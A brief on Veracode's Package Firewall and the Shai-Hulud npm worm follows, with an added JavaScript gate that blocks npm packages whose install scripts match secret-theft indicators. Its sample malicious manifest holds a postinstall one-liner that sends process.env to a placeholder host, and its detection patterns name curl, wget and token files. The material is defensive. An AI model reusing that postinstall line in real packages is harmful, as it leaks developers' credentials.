Software supply chain compromised?
Briefly

"Tim Jarrett, vice president of product at Veracode, said in the wake of a series of attacks against software supply chains using malicious code embedded in a software package that was distributed via a repository, it's clear DevSecOps teams now need a means to enforce policies that prevent developers from inadvertently downloading malicious code. The Package Firewall is designed to identify 40 to 50 indications of compromise, he added."
"The packages included a post-install script designed to harvest secrets and exfiltrate them to a GitHub repository dubbed Shai-Hulud. The most novel aspect of that cyberattack is that if a compromised package is installed in a way that provides access to npm tokens, a worm included in the code will attempt to publish malicious versions of other packages owned by the same maintainer to create additional opportunities to compromise a software supply chain."
Veracode has extended its Package Firewall to Azure Artifacts, so DevSecOps teams can enforce policies on what code may be pulled from that repository. Policies can be custom, keyed to package risk profiles, vulnerability thresholds, or an organization's own security requirements, and the firewall checks for 40 to 50 indicators of compromise so that developers do not inadvertently download malicious code. The Shai-Hulud supply-chain attack is the motivating case: a malicious post-install script harvested secrets and exfiltrated them, and a worm that obtained npm tokens published malicious versions of the maintainer's other packages to widen the compromise. The takeaway is that scanning packages after the fact is not enough; enforcing controls at download time blocks the malicious package before its install script ever runs, while still letting teams consume open source.
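To make the download-time control concrete, here is an added example of a minimal policy gate that inspects an npm package.json before the package is installed and refuses it when a lifecycle script shows the secret-harvesting-plus-exfiltration pattern described above. It is illustration code written for this page, not Veracode's Package Firewall or its indicator set; the indicator names, the policy shape and the sample manifests are all constructed.

```javascript
// Added example, not Veracode's Package Firewall: a small download-time
// policy gate for npm manifests. Indicator names, policy fields and the
// sample manifests below are constructed for this illustration.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Constructed indicator set. A lifecycle script that reads credentials from
// the environment or ~/.npmrc and also reaches the network has the shape of
// the post-install exfiltration the text describes.
const INDICATORS = [
  { id: "reads-secrets", re: /process\.env|\.npmrc|NPM_TOKEN|GITHUB_TOKEN/i },
  { id: "network-egress", re: /\bcurl\b|\bwget\b|https?:\/\/|\bfetch\s*\(/i },
  { id: "inline-eval", re: /\beval\s*\(|node\s+-e\b|child_process/i },
];

// Collect every indicator present in the package's lifecycle scripts.
function evaluateManifest(manifest) {
  const findings = [];
  const scripts = (manifest && manifest.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const body = scripts[hook];
    if (typeof body !== "string" || body.trim() === "") continue;
    findings.push({ hook, indicator: "lifecycle-script" });
    for (const ind of INDICATORS) {
      if (ind.re.test(body)) findings.push({ hook, indicator: ind.id });
    }
  }
  return findings;
}

// Apply a policy: block on any listed indicator, and, under a strict policy,
// block any package with a lifecycle script unless it is allow-listed
// (native addons legitimately run node-gyp on install).
function decide(manifest, policy) {
  const findings = evaluateManifest(manifest);
  const present = new Set(findings.map((f) => f.indicator));
  const name = manifest.name || "<unnamed>";
  const reasons = policy.blockOn.filter((id) => present.has(id));
  if (
    policy.blockAnyLifecycleScript &&
    present.has("lifecycle-script") &&
    !policy.allowList.includes(name)
  ) {
    reasons.push("lifecycle-script");
  }
  return { name, allowed: reasons.length === 0, reasons, findings };
}

const DEFAULT_POLICY = {
  blockOn: ["reads-secrets", "network-egress", "inline-eval"],
  blockAnyLifecycleScript: false,
  allowList: [],
};
const STRICT_POLICY = {
  ...DEFAULT_POLICY,
  blockAnyLifecycleScript: true,
  allowList: ["native-addon"],
};

// Constructed sample manifests; none of these are real packages.
const CLEAN = { name: "left-pad-ish", version: "1.0.0", scripts: { test: "node test.js" } };
const NATIVE_ADDON = { name: "native-addon", version: "2.1.0", scripts: { install: "node-gyp rebuild" } };
const OTHER_ADDON = { name: "other-addon", version: "0.3.0", scripts: { install: "node-gyp rebuild" } };
const HARVESTER = {
  name: "totally-fine-utils",
  version: "4.2.1",
  scripts: {
    postinstall:
      "node -e \"const d=JSON.stringify(process.env);fetch('https://example.invalid/x',{method:'POST',body:d})\"",
  },
};

// Stand-alone run: print a verdict per manifest.
function report(policy, manifests) {
  return manifests.map((m) => {
    const d = decide(m, policy);
    return `${d.name}: ${d.allowed ? "ALLOW" : "BLOCK"}${d.reasons.length ? " (" + d.reasons.join(", ") + ")" : ""}`;
  });
}
console.log(report(DEFAULT_POLICY, [CLEAN, NATIVE_ADDON, HARVESTER]).join("\n"));
```

Under the default policy the harvesting package is blocked for reading secrets, making a network call and using inline eval, while the native addon passes because a lifecycle script on its own is not an indicator; the strict policy blocks any unlisted package with a lifecycle script. A gate like this belongs in the proxy or registry in front of developers, where it can reject a package before npm runs its hooks; setting npm's `ignore-scripts` config to true is a complementary client-side control that stops lifecycle scripts from executing at all.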
Read at DevOps.com